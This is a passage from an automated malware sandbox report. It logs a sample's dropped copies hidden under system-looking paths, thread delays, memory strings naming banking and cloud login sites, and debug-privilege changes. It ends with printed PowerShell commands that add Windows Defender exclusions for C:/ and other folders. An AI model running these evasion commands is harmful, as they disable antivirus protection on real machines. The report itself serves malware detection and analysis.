                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 598984
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 598672
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 597906
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 597078
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 596641
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 596067
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 595375
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 595062
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 3600000
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 594234
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 593780
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 593234
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 592891
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 592516
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 591859
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 591500
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 591156
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 590859
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 590172
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 589953
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 589750
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 589516
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 589153
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 588922
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 588748
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 588453
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 588257
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 588019
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 587594
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 587391
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 587190
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 586922
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 586562
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 586348
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 585984
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 585743
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 585031
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 584708
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 584125
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 583953
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 583500
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 583371
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 582766
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 582531
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 582396
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 581172
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 579531
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 579234
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 579022
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 578594
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 578247
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 578062
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 577641
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 576484
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 576234
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 576086
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 575939
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 575793
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 575685
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 575566
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 575395
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 575237
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 575122
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 574993
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 574219
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 574040
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 573725
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 573437
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 573062
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 572828
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 572422
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 572196
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 572016
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 571797
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 571453
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 571222
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 570984
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 570812
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 570547
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 569516
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 568964
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 568687
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 568394
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 568178
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 568036
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 567902
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 567680
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 566844
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 566699
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 566420
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 566281
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 566141
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 565964
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 565816
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 565702
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 565509
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 565406
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 565199
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 565014
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 564885
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 564781
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 564669
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 564560
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 564452
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 564343
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 564234
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 564125
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 564016
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 563906
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 563797
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 563683
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 563566
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 563453
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 563341
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 563234
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 563125
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 562002
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 561887
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 561780
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 561672
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 561562
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 561438
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 561328
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 561157
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 561047
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 560934
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 560817
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 560703
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 560585
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 559885
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 559757
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Downloads\smartscreen.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Downloads\smartscreen.exeThread delayed: delay time: 922337203685477
                            Source: C:\Recovery\WmiPrvSE.exeThread delayed: delay time: 922337203685477
                            Source: C:\Recovery\WmiPrvSE.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile opened: C:\Users\userJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: YtBWM7vFD0.36.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                            Source: YtBWM7vFD0.36.drBinary or memory string: discord.comVMware20,11696428655f
                            Source: YtBWM7vFD0.36.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                            Source: YtBWM7vFD0.36.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                            Source: YtBWM7vFD0.36.drBinary or memory string: global block list test formVMware20,11696428655
                            Source: YtBWM7vFD0.36.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2256096642.000000001B25B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                            Source: YtBWM7vFD0.36.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                            Source: YtBWM7vFD0.36.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                            Source: YtBWM7vFD0.36.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                            Source: YtBWM7vFD0.36.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                            Source: YtBWM7vFD0.36.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                            Source: YtBWM7vFD0.36.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                            Source: YtBWM7vFD0.36.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                            Source: YtBWM7vFD0.36.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                            Source: YtBWM7vFD0.36.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                            Source: YtBWM7vFD0.36.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                            Source: YtBWM7vFD0.36.drBinary or memory string: outlook.office.comVMware20,11696428655s
                            Source: YtBWM7vFD0.36.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                            Source: YtBWM7vFD0.36.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2260842550.000000001D87A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_
                            Source: YtBWM7vFD0.36.drBinary or memory string: AMC password management pageVMware20,11696428655
                            Source: YtBWM7vFD0.36.drBinary or memory string: tasks.office.comVMware20,11696428655o
                            Source: w32tm.exe, 00000034.00000002.2297376786.000001E2D0F19000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll|
                            Source: YtBWM7vFD0.36.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                            Source: YtBWM7vFD0.36.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                            Source: YtBWM7vFD0.36.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                            Source: YtBWM7vFD0.36.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                            Source: YtBWM7vFD0.36.drBinary or memory string: dev.azure.comVMware20,11696428655j
                            Source: YtBWM7vFD0.36.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                            Source: YtBWM7vFD0.36.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                            Source: YtBWM7vFD0.36.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                            Source: YtBWM7vFD0.36.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                            Source: YtBWM7vFD0.36.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess token adjusted: Debug
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Downloads\smartscreen.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Downloads\smartscreen.exeProcess token adjusted: Debug
                            Source: C:\Recovery\WmiPrvSE.exeProcess token adjusted: Debug
                            Source: C:\Recovery\WmiPrvSE.exeProcess token adjusted: Debug
                            Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeMemory allocated: page read and write | page guardJump to behavior

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            Adds a directory exclusion to Windows Defender
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
